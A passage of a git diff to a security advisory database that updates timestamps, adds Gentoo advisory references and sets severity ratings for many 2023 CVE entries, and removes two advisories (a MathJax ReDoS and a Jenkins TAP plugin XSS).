 "id": "GHSA-mjq9-8vf6-qh49",
- "modified": "2023-08-21T18:31:23Z",
+ "modified": "2024-01-31T18:31:19Z",
 "published": "2023-08-15T18:31:33Z",
 "aliases": [
 "CVE-2023-4353"
@@ -37,6 +37,10 @@
 "type": "WEB",
 "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/OCFEK63FUHFXZH5MSG6TNQOXMQWM4M5S/"
 },
+ {
+ "type": "WEB",
+ "url": "https://security.gentoo.org/glsa/202401-34"
+ },
 {
 "type": "WEB",
 "url": "https://www.debian.org/security/2023/dsa-5479"
@@ -46,7 +50,7 @@
 "cwe_ids": [
 "CWE-787"
 ],
- "severity": null,
+ "severity": "HIGH",
 "github_reviewed": false,
 "github_reviewed_at": null,
 "nvd_published_at": "2023-08-15T18:15:11Z"
diff --git a/advisories/unreviewed/2023/08/GHSA-pgwm-pcfw-q4v8/GHSA-pgwm-pcfw-q4v8.json b/advisories/unreviewed/2023/08/GHSA-pgwm-pcfw-q4v8/GHSA-pgwm-pcfw-q4v8.json
index d8bb6080f77f4..ecf6ecadd06b8 100644
--- a/advisories/unreviewed/2023/08/GHSA-pgwm-pcfw-q4v8/GHSA-pgwm-pcfw-q4v8.json
+++ b/advisories/unreviewed/2023/08/GHSA-pgwm-pcfw-q4v8/GHSA-pgwm-pcfw-q4v8.json
@@ -1,7 +1,7 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-pgwm-pcfw-q4v8",
- "modified": "2023-08-22T18:31:31Z",
+ "modified": "2024-01-31T18:31:19Z",
 "published": "2023-08-15T18:31:33Z",
 "aliases": [
 "CVE-2023-4363"
@@ -37,6 +37,10 @@
 "type": "WEB",
 "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/OCFEK63FUHFXZH5MSG6TNQOXMQWM4M5S/"
 },
+ {
+ "type": "WEB",
+ "url": "https://security.gentoo.org/glsa/202401-34"
+ },
 {
 "type": "WEB",
 "url": "https://www.debian.org/security/2023/dsa-5479"
@@ -46,7 +50,7 @@
 "cwe_ids": [

 ],
- "severity": null,
+ "severity": "MODERATE",
 "github_reviewed": false,
 "github_reviewed_at": null,
 "nvd_published_at": "2023-08-15T18:15:13Z"
diff --git a/advisories/unreviewed/2023/08/GHSA-prm9-8h85-6m44/GHSA-prm9-8h85-6m44.json b/advisories/unreviewed/2023/08/GHSA-prm9-8h85-6m44/GHSA-prm9-8h85-6m44.json
index 74e6a1a3efe8f..0728f07a74dc3 100644
--- a/advisories/unreviewed/2023/08/GHSA-prm9-8h85-6m44/GHSA-prm9-8h85-6m44.json
+++ b/advisories/unreviewed/2023/08/GHSA-prm9-8h85-6m44/GHSA-prm9-8h85-6m44.json
@@ -1,7 +1,7 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-prm9-8h85-6m44",
- "modified": "2023-08-04T06:30:19Z",
+ "modified": "2024-01-31T18:31:18Z",
 "published": "2023-08-02T00:30:39Z",
 "aliases": [
 "CVE-2023-3733"
@@ -32,13 +32,17 @@
 {
 "type": "WEB",
 "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/PQKT7EGDD2P3L7S3NXEDDRCPK4NNZNWJ/"
+ },
+ {
+ "type": "WEB",
+ "url": "https://security.gentoo.org/glsa/202401-34"
 }
 ],
 "database_specific": {
 "cwe_ids": [

 ],
- "severity": null,
+ "severity": "MODERATE",
 "github_reviewed": false,
 "github_reviewed_at": null,
 "nvd_published_at": "2023-08-01T23:15:32Z"
diff --git a/advisories/unreviewed/2023/08/GHSA-q56g-qr28-qh57/GHSA-q56g-qr28-qh57.json b/advisories/unreviewed/2023/08/GHSA-q56g-qr28-qh57/GHSA-q56g-qr28-qh57.json
index 5ff40a66c3020..a1b02dbb0c3e5 100644
--- a/advisories/unreviewed/2023/08/GHSA-q56g-qr28-qh57/GHSA-q56g-qr28-qh57.json
+++ b/advisories/unreviewed/2023/08/GHSA-q56g-qr28-qh57/GHSA-q56g-qr28-qh57.json
@@ -1,7 +1,7 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-q56g-qr28-qh57",
- "modified": "2023-08-17T21:30:53Z",
+ "modified": "2024-02-02T18:30:24Z",
 "published": "2023-08-17T21:30:53Z",
 "aliases": [
 "CVE-2023-36845"
@@ -32,13 +32,17 @@
 {
 "type": "WEB",
 "url": "http://packetstormsecurity.com/files/174865/Juniper-SRX-Firewall-EX-Switch-Remote-Code-Execution.html"
+ },
+ {
+ "type": "WEB",
+ "url": "http://packetstormsecurity.com/files/176969/Juniper-SRX-Firewall-EX-Switch-Remote-Code-Execution.html"
 }
 ],
 "database_specific": {
 "cwe_ids": [
 "CWE-473"
 ],
- "severity": null,
+ "severity": "CRITICAL",
 "github_reviewed": false,
 "github_reviewed_at": null,
 "nvd_published_at": "2023-08-17T20:15:10Z"
diff --git a/advisories/unreviewed/2023/08/GHSA-q839-jfph-q4wx/GHSA-q839-jfph-q4wx.json b/advisories/unreviewed/2023/08/GHSA-q839-jfph-q4wx/GHSA-q839-jfph-q4wx.json
index b2f78e35879b2..5a7a231f45b44 100644
--- a/advisories/unreviewed/2023/08/GHSA-q839-jfph-q4wx/GHSA-q839-jfph-q4wx.json
+++ b/advisories/unreviewed/2023/08/GHSA-q839-jfph-q4wx/GHSA-q839-jfph-q4wx.json
@@ -1,7 +1,7 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-q839-jfph-q4wx",
- "modified": "2023-08-25T15:32:39Z",
+ "modified": "2024-01-31T18:31:19Z",
 "published": "2023-08-23T00:30:26Z",
 "aliases": [
 "CVE-2023-4431"
@@ -41,6 +41,10 @@
 "type": "WEB",
 "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/KUQ7CTX3W372X3UY56VVNAHCH6H2F4X3/"
 },
+ {
+ "type": "WEB",
+ "url": "https://security.gentoo.org/glsa/202401-34"
+ },
 {
 "type": "WEB",
 "url": "https://www.debian.org/security/2023/dsa-5483"
@@ -50,7 +54,7 @@
 "cwe_ids": [
 "CWE-125"
 ],
- "severity": null,
+ "severity": "HIGH",
 "github_reviewed": false,
 "github_reviewed_at": null,
 "nvd_published_at": "2023-08-23T00:15:09Z"
diff --git a/advisories/unreviewed/2023/08/GHSA-qc3g-vp59-7vwh/GHSA-qc3g-vp59-7vwh.json b/advisories/unreviewed/2023/08/GHSA-qc3g-vp59-7vwh/GHSA-qc3g-vp59-7vwh.json
index e972d78aa041c..3470c7f40e4bb 100644
--- a/advisories/unreviewed/2023/08/GHSA-qc3g-vp59-7vwh/GHSA-qc3g-vp59-7vwh.json
+++ b/advisories/unreviewed/2023/08/GHSA-qc3g-vp59-7vwh/GHSA-qc3g-vp59-7vwh.json
@@ -41,6 +41,10 @@
 "type": "WEB",
 "url": "https://security.gentoo.org/glsa/202312-07"
 },
+ {
+ "type": "WEB",
+ "url": "https://security.gentoo.org/glsa/202401-34"
+ },
 {
 "type": "WEB",
 "url": "https://www.debian.org/security/2023/dsa-5467"
diff --git a/advisories/unreviewed/2023/08/GHSA-qgcm-f4w9-q77h/GHSA-qgcm-f4w9-q77h.json b/advisories/unreviewed/2023/08/GHSA-qgcm-f4w9-q77h/GHSA-qgcm-f4w9-q77h.json
index 1d04b3f7b8548..7c958ec0bb54b 100644
--- a/advisories/unreviewed/2023/08/GHSA-qgcm-f4w9-q77h/GHSA-qgcm-f4w9-q77h.json
+++ b/advisories/unreviewed/2023/08/GHSA-qgcm-f4w9-q77h/GHSA-qgcm-f4w9-q77h.json
@@ -1,7 +1,7 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-qgcm-f4w9-q77h",
- "modified": "2023-08-24T06:30:16Z",
+ "modified": "2024-01-31T18:31:19Z",
 "published": "2023-08-15T18:31:33Z",
 "aliases": [
 "CVE-2023-4358"
@@ -37,6 +37,10 @@
 "type": "WEB",
 "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/OCFEK63FUHFXZH5MSG6TNQOXMQWM4M5S/"
 },
+ {
+ "type": "WEB",
+ "url": "https://security.gentoo.org/glsa/202401-34"
+ },
 {
 "type": "WEB",
 "url": "https://www.debian.org/security/2023/dsa-5479"
@@ -46,7 +50,7 @@
 "cwe_ids": [
 "CWE-416"
 ],
- "severity": null,
+ "severity": "HIGH",
 "github_reviewed": false,
 "github_reviewed_at": null,
 "nvd_published_at": "2023-08-15T18:15:12Z"
diff --git a/advisories/unreviewed/2023/08/GHSA-qj69-r8v9-pg55/GHSA-qj69-r8v9-pg55.json b/advisories/unreviewed/2023/08/GHSA-qj69-r8v9-pg55/GHSA-qj69-r8v9-pg55.json
index 44ad63669d899..8e78d984f760c 100644
--- a/advisories/unreviewed/2023/08/GHSA-qj69-r8v9-pg55/GHSA-qj69-r8v9-pg55.json
+++ b/advisories/unreviewed/2023/08/GHSA-qj69-r8v9-pg55/GHSA-qj69-r8v9-pg55.json
@@ -1,7 +1,7 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-qj69-r8v9-pg55",
- "modified": "2023-08-22T18:31:31Z",
+ "modified": "2024-01-31T18:31:19Z",
 "published": "2023-08-15T18:31:33Z",
 "aliases": [
 "CVE-2023-4367"
@@ -37,6 +37,10 @@
 "type": "WEB",
 "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/OCFEK63FUHFXZH5MSG6TNQOXMQWM4M5S/"
 },
+ {
+ "type": "WEB",
+ "url": "https://security.gentoo.org/glsa/202401-34"
+ },
 {
 "type": "WEB",
 "url": "https://www.debian.org/security/2023/dsa-5479"
@@ -46,7 +50,7 @@
 "cwe_ids": [

 ],
- "severity": null,
+ "severity": "MODERATE",
 "github_reviewed": false,
 "github_reviewed_at": null,
 "nvd_published_at": "2023-08-15T18:15:13Z"
diff --git a/advisories/unreviewed/2023/08/GHSA-qqwc-fhxf-4mf3/GHSA-qqwc-fhxf-4mf3.json b/advisories/unreviewed/2023/08/GHSA-qqwc-fhxf-4mf3/GHSA-qqwc-fhxf-4mf3.json
index 8a72bde1101d1..847a3aea7e311 100644
--- a/advisories/unreviewed/2023/08/GHSA-qqwc-fhxf-4mf3/GHSA-qqwc-fhxf-4mf3.json
+++ b/advisories/unreviewed/2023/08/GHSA-qqwc-fhxf-4mf3/GHSA-qqwc-fhxf-4mf3.json
@@ -1,7 +1,7 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-qqwc-fhxf-4mf3",
- "modified": "2023-08-28T21:31:06Z",
+ "modified": "2024-01-31T18:31:19Z",
 "published": "2023-08-23T00:30:26Z",
 "aliases": [
 "CVE-2023-4427"
@@ -41,6 +41,10 @@
 "type": "WEB",
 "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/KUQ7CTX3W372X3UY56VVNAHCH6H2F4X3/"
 },
+ {
+ "type": "WEB",
+ "url": "https://security.gentoo.org/glsa/202401-34"
+ },
 {
 "type": "WEB",
 "url": "https://www.debian.org/security/2023/dsa-5483"
@@ -54,7 +58,7 @@
 "cwe_ids": [
 "CWE-125"
 ],
- "severity": null,
+ "severity": "HIGH",
 "github_reviewed": false,
 "github_reviewed_at": null,
 "nvd_published_at": "2023-08-23T00:15:09Z"
diff --git a/advisories/unreviewed/2023/08/GHSA-qv79-48vx-52fw/GHSA-qv79-48vx-52fw.json b/advisories/unreviewed/2023/08/GHSA-qv79-48vx-52fw/GHSA-qv79-48vx-52fw.json
index 45e9090c0be3f..8cd8c8a8bbc6c 100644
--- a/advisories/unreviewed/2023/08/GHSA-qv79-48vx-52fw/GHSA-qv79-48vx-52fw.json
+++ b/advisories/unreviewed/2023/08/GHSA-qv79-48vx-52fw/GHSA-qv79-48vx-52fw.json
@@ -1,7 +1,7 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-qv79-48vx-52fw",
- "modified": "2023-08-08T15:33:39Z",
+ "modified": "2024-02-01T03:30:22Z",
 "published": "2023-08-03T00:30:15Z",
 "aliases": [
 "CVE-2023-1437"
@@ -31,7 +31,7 @@
 "CWE-119",
 "CWE-822"
 ],
- "severity": null,
+ "severity": "CRITICAL",
 "github_reviewed": false,
 "github_reviewed_at": null,
 "nvd_published_at": "2023-08-02T23:15:10Z"
diff --git a/advisories/unreviewed/2023/08/GHSA-qxc5-q732-v8v7/GHSA-qxc5-q732-v8v7.json b/advisories/unreviewed/2023/08/GHSA-qxc5-q732-v8v7/GHSA-qxc5-q732-v8v7.json
index a51a792e4ec69..8855eab759552 100644
--- a/advisories/unreviewed/2023/08/GHSA-qxc5-q732-v8v7/GHSA-qxc5-q732-v8v7.json
+++ b/advisories/unreviewed/2023/08/GHSA-qxc5-q732-v8v7/GHSA-qxc5-q732-v8v7.json
@@ -1,7 +1,7 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-qxc5-q732-v8v7",
- "modified": "2023-08-24T06:30:16Z",
+ "modified": "2024-01-31T18:31:19Z",
 "published": "2023-08-15T18:31:33Z",
 "aliases": [
 "CVE-2023-4359"
@@ -37,6 +37,10 @@
 "type": "WEB",
 "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/OCFEK63FUHFXZH5MSG6TNQOXMQWM4M5S/"
 },
+ {
+ "type": "WEB",
+ "url": "https://security.gentoo.org/glsa/202401-34"
+ },
 {
 "type": "WEB",
 "url": "https://www.debian.org/security/2023/dsa-5479"
@@ -46,7 +50,7 @@
 "cwe_ids": [

 ],
- "severity": null,
+ "severity": "MODERATE",
 "github_reviewed": false,
 "github_reviewed_at": null,
 "nvd_published_at": "2023-08-15T18:15:12Z"
diff --git a/advisories/unreviewed/2023/08/GHSA-r43m-48vw-xgp3/GHSA-r43m-48vw-xgp3.json b/advisories/unreviewed/2023/08/GHSA-r43m-48vw-xgp3/GHSA-r43m-48vw-xgp3.json
index 35c91f5d841a9..7e4cc493f6fbd 100644
--- a/advisories/unreviewed/2023/08/GHSA-r43m-48vw-xgp3/GHSA-r43m-48vw-xgp3.json
+++ b/advisories/unreviewed/2023/08/GHSA-r43m-48vw-xgp3/GHSA-r43m-48vw-xgp3.json
@@ -1,7 +1,7 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-r43m-48vw-xgp3",
- "modified": "2023-08-25T15:32:39Z",
+ "modified": "2024-01-31T18:31:19Z",
 "published": "2023-08-23T00:30:26Z",
 "aliases": [
 "CVE-2023-4429"
@@ -41,6 +41,10 @@
 "type": "WEB",
 "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/KUQ7CTX3W372X3UY56VVNAHCH6H2F4X3/"
 },
+ {
+ "type": "WEB",
+ "url": "https://security.gentoo.org/glsa/202401-34"
+ },
 {
 "type": "WEB",
 "url": "https://www.debian.org/security/2023/dsa-5483"
@@ -50,7 +54,7 @@
 "cwe_ids": [
 "CWE-416"
 ],
- "severity": null,
+ "severity": "HIGH",
 "github_reviewed": false,
 "github_reviewed_at": null,
 "nvd_published_at": "2023-08-23T00:15:09Z"
diff --git a/advisories/unreviewed/2023/08/GHSA-r8pr-cp2m-9q75/GHSA-r8pr-cp2m-9q75.json b/advisories/unreviewed/2023/08/GHSA-r8pr-cp2m-9q75/GHSA-r8pr-cp2m-9q75.json
index fe5c2aa23f76e..405fbb5eeb3ff 100644
--- a/advisories/unreviewed/2023/08/GHSA-r8pr-cp2m-9q75/GHSA-r8pr-cp2m-9q75.json
+++ b/advisories/unreviewed/2023/08/GHSA-r8pr-cp2m-9q75/GHSA-r8pr-cp2m-9q75.json
@@ -1,7 +1,7 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-r8pr-cp2m-9q75",
- "modified": "2023-08-21T18:31:23Z",
+ "modified": "2024-01-31T18:31:19Z",
 "published": "2023-08-15T18:31:33Z",
 "aliases": [
 "CVE-2023-4356"
@@ -37,6 +37,10 @@
 "type": "WEB",
 "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/OCFEK63FUHFXZH5MSG6TNQOXMQWM4M5S/"
 },
+ {
+ "type": "WEB",
+ "url": "https://security.gentoo.org/glsa/202401-34"
+ },
 {
 "type": "WEB",
 "url": "https://www.debian.org/security/2023/dsa-5479"
@@ -46,7 +50,7 @@
 "cwe_ids": [
 "CWE-416"
 ],
- "severity": null,
+ "severity": "HIGH",
 "github_reviewed": false,
 "github_reviewed_at": null,
 "nvd_published_at": "2023-08-15T18:15:12Z"
diff --git a/advisories/unreviewed/2023/08/GHSA-rq4v-7hxq-wpm5/GHSA-rq4v-7hxq-wpm5.json b/advisories/unreviewed/2023/08/GHSA-rq4v-7hxq-wpm5/GHSA-rq4v-7hxq-wpm5.json
index 9e87d3d001c1e..4d726e6bb8591 100644
--- a/advisories/unreviewed/2023/08/GHSA-rq4v-7hxq-wpm5/GHSA-rq4v-7hxq-wpm5.json
+++ b/advisories/unreviewed/2023/08/GHSA-rq4v-7hxq-wpm5/GHSA-rq4v-7hxq-wpm5.json
@@ -1,7 +1,7 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-rq4v-7hxq-wpm5",
- "modified": "2023-08-21T18:31:23Z",
+ "modified": "2024-01-31T18:31:19Z",
 "published": "2023-08-15T18:31:33Z",
 "aliases": [
 "CVE-2023-4354"
@@ -37,6 +37,10 @@
 "type": "WEB",
 "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/OCFEK63FUHFXZH5MSG6TNQOXMQWM4M5S/"
 },
+ {
+ "type": "WEB",
+ "url": "https://security.gentoo.org/glsa/202401-34"
+ },
 {
 "type": "WEB",
 "url": "https://www.debian.org/security/2023/dsa-5479"
@@ -50,7 +54,7 @@
 "cwe_ids": [
 "CWE-787"
 ],
- "severity": null,
+ "severity": "HIGH",
 "github_reviewed": false,
 "github_reviewed_at": null,
 "nvd_published_at": "2023-08-15T18:15:11Z"
diff --git a/advisories/unreviewed/2023/08/GHSA-v638-q856-grg8/GHSA-v638-q856-grg8.json b/advisories/unreviewed/2023/08/GHSA-v638-q856-grg8/GHSA-v638-q856-grg8.json
deleted file mode 100644
index 3b364b1ca735a..0000000000000
--- a/advisories/unreviewed/2023/08/GHSA-v638-q856-grg8/GHSA-v638-q856-grg8.json
+++ /dev/null
@@ -1,38 +0,0 @@
-{
- "schema_version": "1.4.0",
- "id": "GHSA-v638-q856-grg8",
- "modified": "2023-08-31T21:32:38Z",
- "published": "2023-08-29T21:30:21Z",
- "aliases": [
- "CVE-2023-39663"
- ],
- "details": "Mathjax up to v2.7.9 was discovered to contain two Regular expression Denial of Service (ReDoS) vulnerabilities in MathJax.js via the components pattern and markdownPattern.",
- "severity": [
- {
- "type": "CVSS_V3",
- "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
- }
- ],
- "affected": [
-
- ],
- "references": [
- {
- "type": "ADVISORY",
- "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-39663"
- },
- {
- "type": "WEB",
- "url": "https://github.com/mathjax/MathJax/issues/3074"
- }
- ],
- "database_specific": {
- "cwe_ids": [
- "CWE-1333"
- ],
- "severity": null,
- "github_reviewed": false,
- "github_reviewed_at": null,
- "nvd_published_at": "2023-08-29T20:15:09Z"
- }
-}
\ No newline at end of file
diff --git a/advisories/unreviewed/2023/08/GHSA-vp8r-986v-6qj4/GHSA-vp8r-986v-6qj4.json b/advisories/unreviewed/2023/08/GHSA-vp8r-986v-6qj4/GHSA-vp8r-986v-6qj4.json
index 5f96d727574f5..d8dd3ecbe2708 100644
--- a/advisories/unreviewed/2023/08/GHSA-vp8r-986v-6qj4/GHSA-vp8r-986v-6qj4.json
+++ b/advisories/unreviewed/2023/08/GHSA-vp8r-986v-6qj4/GHSA-vp8r-986v-6qj4.json
@@ -1,7 +1,7 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-vp8r-986v-6qj4",
- "modified": "2023-08-21T18:31:23Z",
+ "modified": "2024-01-31T18:31:19Z",
 "published": "2023-08-15T18:31:33Z",
 "aliases": [
 "CVE-2023-4352"
@@ -37,6 +37,10 @@
 "type": "WEB",
 "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/OCFEK63FUHFXZH5MSG6TNQOXMQWM4M5S/"
 },
+ {
+ "type": "WEB",
+ "url": "https://security.gentoo.org/glsa/202401-34"
+ },
 {
 "type": "WEB",
 "url": "https://www.debian.org/security/2023/dsa-5479"
@@ -50,7 +54,7 @@
 "cwe_ids": [
 "CWE-843"
 ],
- "severity": null,
+ "severity": "HIGH",
 "github_reviewed": false,
 "github_reviewed_at": null,
 "nvd_published_at": "2023-08-15T18:15:11Z"
diff --git a/advisories/unreviewed/2023/08/GHSA-w8hm-59h4-7ff2/GHSA-w8hm-59h4-7ff2.json b/advisories/unreviewed/2023/08/GHSA-w8hm-59h4-7ff2/GHSA-w8hm-59h4-7ff2.json
index 5acf8bdf1330c..6c45a452a0666 100644
--- a/advisories/unreviewed/2023/08/GHSA-w8hm-59h4-7ff2/GHSA-w8hm-59h4-7ff2.json
+++ b/advisories/unreviewed/2023/08/GHSA-w8hm-59h4-7ff2/GHSA-w8hm-59h4-7ff2.json
@@ -1,7 +1,7 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-w8hm-59h4-7ff2",
- "modified": "2023-08-25T00:31:57Z",
+ "modified": "2024-02-08T21:30:33Z",
 "published": "2023-08-22T21:30:25Z",
 "aliases": [
 "CVE-2020-21469"
@@ -38,7 +38,7 @@
 "cwe_ids": [
 "CWE-120"
 ],
- "severity": null,
+ "severity": "MODERATE",
 "github_reviewed": false,
 "github_reviewed_at": null,
 "nvd_published_at": "2023-08-22T19:16:13Z"
diff --git a/advisories/unreviewed/2023/08/GHSA-wh89-h5f7-hhcr/GHSA-wh89-h5f7-hhcr.json b/advisories/unreviewed/2023/08/GHSA-wh89-h5f7-hhcr/GHSA-wh89-h5f7-hhcr.json
index 98534cc512c8d..eda8d44154372 100644
--- a/advisories/unreviewed/2023/08/GHSA-wh89-h5f7-hhcr/GHSA-wh89-h5f7-hhcr.json
+++ b/advisories/unreviewed/2023/08/GHSA-wh89-h5f7-hhcr/GHSA-wh89-h5f7-hhcr.json
@@ -41,6 +41,10 @@
 "type": "WEB",
 "url": "https://security.gentoo.org/glsa/202312-07"
 },
+ {
+ "type": "WEB",
+ "url": "https://security.gentoo.org/glsa/202401-34"
+ },
 {
 "type": "WEB",
 "url": "https://www.debian.org/security/2023/dsa-5467"
diff --git a/advisories/unreviewed/2023/08/GHSA-x2x8-ph79-9fqc/GHSA-x2x8-ph79-9fqc.json b/advisories/unreviewed/2023/08/GHSA-x2x8-ph79-9fqc/GHSA-x2x8-ph79-9fqc.json
index a8db4869c2519..536d63a8028f4 100644
--- a/advisories/unreviewed/2023/08/GHSA-x2x8-ph79-9fqc/GHSA-x2x8-ph79-9fqc.json
+++ b/advisories/unreviewed/2023/08/GHSA-x2x8-ph79-9fqc/GHSA-x2x8-ph79-9fqc.json
@@ -41,6 +41,10 @@
 "type": "WEB",
 "url": "https://security.gentoo.org/glsa/202312-07"
 },
+ {
+ "type": "WEB",
+ "url": "https://security.gentoo.org/glsa/202401-34"
+ },
 {
 "type": "WEB",
 "url": "https://www.debian.org/security/2023/dsa-5467"
diff --git a/advisories/unreviewed/2023/08/GHSA-xrw8-8992-37w4/GHSA-xrw8-8992-37w4.json b/advisories/unreviewed/2023/08/GHSA-xrw8-8992-37w4/GHSA-xrw8-8992-37w4.json
index 0420c7eb5e1c1..2f3feb0da054f 100644
--- a/advisories/unreviewed/2023/08/GHSA-xrw8-8992-37w4/GHSA-xrw8-8992-37w4.json
+++ b/advisories/unreviewed/2023/08/GHSA-xrw8-8992-37w4/GHSA-xrw8-8992-37w4.json
@@ -1,7 +1,7 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-xrw8-8992-37w4",
- "modified": "2023-08-21T18:31:23Z",
+ "modified": "2024-01-31T18:31:19Z",
 "published": "2023-08-15T18:31:33Z",
 "aliases": [
 "CVE-2023-4355"
@@ -37,6 +37,10 @@
 "type": "WEB",
 "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/OCFEK63FUHFXZH5MSG6TNQOXMQWM4M5S/"
 },
+ {
+ "type": "WEB",
+ "url": "https://security.gentoo.org/glsa/202401-34"
+ },
 {
 "type": "WEB",
 "url": "https://www.debian.org/security/2023/dsa-5479"
@@ -50,7 +54,7 @@
 "cwe_ids": [
 "CWE-787"
 ],
- "severity": null,
+ "severity": "HIGH",
 "github_reviewed": false,
 "github_reviewed_at": null,
 "nvd_published_at": "2023-08-15T18:15:11Z"
diff --git a/advisories/unreviewed/2023/08/GHSA-xwc7-4px3-fqx8/GHSA-xwc7-4px3-fqx8.json b/advisories/unreviewed/2023/08/GHSA-xwc7-4px3-fqx8/GHSA-xwc7-4px3-fqx8.json
index 045b14f33af3c..c400950859b6f 100644
--- a/advisories/unreviewed/2023/08/GHSA-xwc7-4px3-fqx8/GHSA-xwc7-4px3-fqx8.json
+++ b/advisories/unreviewed/2023/08/GHSA-xwc7-4px3-fqx8/GHSA-xwc7-4px3-fqx8.json
@@ -1,7 +1,7 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-xwc7-4px3-fqx8",
- "modified": "2023-08-05T06:30:59Z",
+ "modified": "2024-01-31T18:31:18Z",
 "published": "2023-08-02T00:30:39Z",
 "aliases": [
 "CVE-2023-3738"
@@ -32,13 +32,17 @@
 {
 "type": "WEB",
 "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/PQKT7EGDD2P3L7S3NXEDDRCPK4NNZNWJ/"
+ },
+ {
+ "type": "WEB",
+ "url": "https://security.gentoo.org/glsa/202401-34"
 }
 ],
 "database_specific": {
 "cwe_ids": [
 
 ],
- "severity": null,
+ "severity": "MODERATE",
 "github_reviewed": false,
 "github_reviewed_at": null,
 "nvd_published_at": "2023-08-01T23:15:33Z"
diff --git a/advisories/unreviewed/2023/09/GHSA-2747-7gmp-qm3g/GHSA-2747-7gmp-qm3g.json b/advisories/unreviewed/2023/09/GHSA-2747-7gmp-qm3g/GHSA-2747-7gmp-qm3g.json
index 2f1a527b3d916..a15841b2fe478 100644
--- a/advisories/unreviewed/2023/09/GHSA-2747-7gmp-qm3g/GHSA-2747-7gmp-qm3g.json
+++ b/advisories/unreviewed/2023/09/GHSA-2747-7gmp-qm3g/GHSA-2747-7gmp-qm3g.json
@@ -49,6 +49,10 @@
 "type": "WEB",
 "url": "https://security.gentoo.org/glsa/202312-07"
 },
+ {
+ "type": "WEB",
+ "url": "https://security.gentoo.org/glsa/202401-34"
+ },
 {
 "type": "WEB",
 "url": "https://www.debian.org/security/2023/dsa-5491"
diff --git a/advisories/unreviewed/2023/09/GHSA-2hcr-79rm-r8rp/GHSA-2hcr-79rm-r8rp.json b/advisories/unreviewed/2023/09/GHSA-2hcr-79rm-r8rp/GHSA-2hcr-79rm-r8rp.json
index 5025a83b6c1bd..258d2dfb595e8 100644
--- a/advisories/unreviewed/2023/09/GHSA-2hcr-79rm-r8rp/GHSA-2hcr-79rm-r8rp.json
+++ b/advisories/unreviewed/2023/09/GHSA-2hcr-79rm-r8rp/GHSA-2hcr-79rm-r8rp.json
@@ -33,6 +33,10 @@
 "type": "WEB",
 "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/EYRHTFVN6FTXLZ27IPTNRSXKBAR2SOMA/"
 },
+ {
+ "type": "WEB",
+ "url": "https://security.gentoo.org/glsa/202401-33"
+ },
 {
 "type": "WEB",
 "url": "https://support.apple.com/en-us/HT213926"
diff --git a/advisories/unreviewed/2023/09/GHSA-3vcr-579j-4x48/GHSA-3vcr-579j-4x48.json b/advisories/unreviewed/2023/09/GHSA-3vcr-579j-4x48/GHSA-3vcr-579j-4x48.json
deleted file mode 100644
index c1517a4c3a1c9..0000000000000
--- a/advisories/unreviewed/2023/09/GHSA-3vcr-579j-4x48/GHSA-3vcr-579j-4x48.json
+++ /dev/null
@@ -1,39 +0,0 @@
-{
- "schema_version": "1.4.0",
- "id": "GHSA-3vcr-579j-4x48",
- "modified": "2023-09-06T15:30:26Z",
- "published": "2023-09-06T15:30:26Z",
- "aliases": [
- "CVE-2023-41940"
- ],
- "details": "Jenkins TAP Plugin 2.3 and earlier does not escape TAP file contents, resulting in a stored cross-site scripting (XSS) vulnerability exploitable by attackers able to control TAP file contents.",
- "severity": [
-
- ],
- "affected": [
-
- ],
- "references": [
- {
- "type": "ADVISORY",
- "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-41940"
- },
- {
- "type": "WEB",
- "url": "https://www.jenkins.io/security/advisory/2023-09-06/#SECURITY-3190"
- },
- {
- "type": "WEB",
- "url": "http://www.openwall.com/lists/oss-security/2023/09/06/9"
- }
- ],
- "database_specific": {
- "cwe_ids": [
-
- ],
- "severity": null,
- "github_reviewed": false,
- "github_reviewed_at": null,
- "nvd_published_at": "2023-09-06T13:15:11Z"
- }
-}
\ No newline at end of file
diff --git a/advisories/unreviewed/2023/09/GHSA-3wjr-p76q-rg8q/GHSA-3wjr-p76q-rg8q.json b/advisories/unreviewed/2023/09/GHSA-3wjr-p76q-rg8q/GHSA-3wjr-p76q-rg8q.json
index c173a0ddbf471..1157c1a54d129 100644
--- a/advisories/unreviewed/2023/09/GHSA-3wjr-p76q-rg8q/GHSA-3wjr-p76q-rg8q.json
+++ b/advisories/unreviewed/2023/09/GHSA-3wjr-p76q-rg8q/GHSA-3wjr-p76q-rg8q.json
@@ -53,6 +53,10 @@
 "type": "WEB",
 "url": "https://security.gentoo.org/glsa/202312-07"
 },
+ {
+ "type": "WEB",
